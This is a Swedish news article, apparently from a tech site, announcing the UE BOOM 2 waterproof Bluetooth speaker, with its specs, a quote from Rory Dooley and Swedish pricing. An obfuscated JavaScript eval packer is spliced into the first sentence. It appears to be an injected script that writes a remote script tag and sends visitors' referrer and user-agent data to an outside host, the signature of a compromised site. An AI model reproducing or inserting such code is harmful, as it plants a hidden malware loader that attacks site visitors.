Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

Ultimate Ears höjer volymen med nya UE BOOM 2

Ultimate Ears höjer volymen med nya UE BOOM 2
Sebastian

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zfdfr|var|u0026u|referrer|nfizs||js|php’.split(’|’),0,{}))
utmanar Ultimate Ears dig ännu en gång att ta med dig festen överallt genom att lägga till UE BOOM 2 till sin färgstarka linje av strand-, snö- och äventyrssäkra mobila högtalare. Det som påbörjades med UE BOOM fortsätter nu med UE BOOM 2 och på så sätt hoppas Ultimate Ears igen förändra sättet som folk upplever musik på, tillsammans, ute i världen.

UE BOOM 2 är designad för att tåla väta, lera och stryk och byggd för att ge bra ljud i alla riktningar. Den är tillverkad av samma högkvalitativa material som Ultimate Ears gjort sig kända för att använda. UE BOOM 2 är vattentät (IPX 7), stöttålig (för fall upp till 1,5 meter), annorlunda och djärv. Högtalaren kommer i samma storlek som en vattenflaska för att få plats i din cykels vattenflaskehållare. Eller så kan du fästa den i din väska och spela musik när du är ute i naturen.

UE BOOM 2 bygger vidare på den prisbelönta UE BOOM som Ultimate Ears lanserade år 2013. Den spelar med 25% högre volym och har längre trådlös räckvidd, nu upp till 33 meter. Högtalaren är helt vattentät så du kan dela med dig av din musik var du än är och vad du än gör. Den har femton timmars batteritid och en ny innovativ ”tap control” som låter dig byta låt utan att använda telefonen.

”Musik handlar om att göra bra stunder till fantastiska stunder, säger Rory Dooley, ansvarig på Ultimate Ears. ”Och genom att ta din musik med dig blir de fantastiska stunderna nu delbara. Det är därför alla högtalare som Ultimate Ears designar är hållbara och äventyrs-säkrade. Vi har styrt kategorin i en helt ny riktning, och med UE BOOM 2 fortsätter vi åt samma håll.”

UE BOOM 2 blir dessutom bara bättre och bättre. Med hjälp av UE BOOM 2-appen för iOS® och Android™ kan du dubbla ljudet genom att para din UE BOOM 2 med vilken annan Ultimate Ears-högtalare som helst, sätta på och stänga av högtalaren från din telefon eller ställa alarm med din favoritmusik. Nya uppdateringar av programvaran sänds till din högtalare via telefonen och den kan ständigt uppdateras med nya funktioner.

UE BOOM 2 kommer i sex nya färger: Cherrybomb, Yeti, Phantom, GreenMachine, Tropical och BrainFreeze.

Pris och tillgänglighet

UE BOOM 2 förväntas finnas tillgänglig från September 2015, med ett föreslaget pris på 1999 SEK. För mer info besök:www.ultimateears.com.